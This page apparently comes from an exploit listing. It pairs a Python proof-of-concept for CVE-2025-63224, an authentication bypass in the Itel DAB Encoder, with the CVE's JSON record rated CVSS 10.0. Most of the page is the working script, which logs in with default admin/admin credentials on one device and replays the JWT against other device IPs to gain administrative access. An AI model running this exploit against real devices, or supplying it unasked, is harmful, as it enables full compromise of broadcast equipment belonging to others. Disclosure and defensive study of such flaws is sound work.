CVE-2025-63224

import requests import json # CVE-2025-63224 PoC - Itel DAB Encoder Authentication Bypass # Target: Itel DAB Encoder (IDEnc build 25aec8d) # Vulnerability: JWT token reuse across devices def exploit_cve_2025_63224(target_ip, valid_jwt_token): """ Exploit authentication bypass in Itel DAB Encoder Args: target_ip: Target device IP address valid_jwt_token: Valid JWT token from any device with same firmware Returns: Boolean indicating exploit success """ target_url = f"http://{target_ip}/api/admin/authenticate" headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {valid_jwt_token}' } payload = { 'action': 'authenticate', 'token': valid_jwt_token } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if data.get('authenticated') or data.get('status') == 'success': print(f"[+] Authentication bypass successful on {target_ip}") print(f"[+] Admin access granted with token: {valid_jwt_token}") return True print(f"[-] Exploitation failed on {target_ip}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def get_valid_token(source_ip): """ Obtain valid JWT token from a source device Replace with actual exploitation method """ login_url = f"http://{source_ip}/api/login" credentials = {'username': 'admin', 'password': 'admin'} try: response = requests.post(login_url, json=credentials, timeout=10) if response.status_code == 200: data = response.json() return data.get('token') except: return None if __name__ == "__main__": source_device = "192.168.1.100" target_devices = ["192.168.1.101", "192.168.1.102"] print("[*] Obtaining valid JWT token from source device...") valid_token = get_valid_token(source_device) if valid_token: print(f"[+] Got token: {valid_token}") for target in target_devices: exploit_cve_2025_63224(target, valid_token) else: print("[-] Failed to obtain token")

{"cve": {"id": "CVE-2025-63224", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:48.450", "lastModified": "2026-01-15T19:46:26.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Itel DAB Encoder (IDEnc build 25aec8d) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-384"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:itel:idenc_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "50718176-F6A6-4A7E-886C-4856801D1E95"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:itel:idenc:-:*:*:*:*:*:*:*", "matchCriteriaId": "292347B5-4979-44A2-9C83-BDEDF1993191"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63224_Itel%20DAB%20Encoder%20Authentication%20Bypass", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.itel.it/", "source": "[email protected]", "tags": ["Product"]}]}}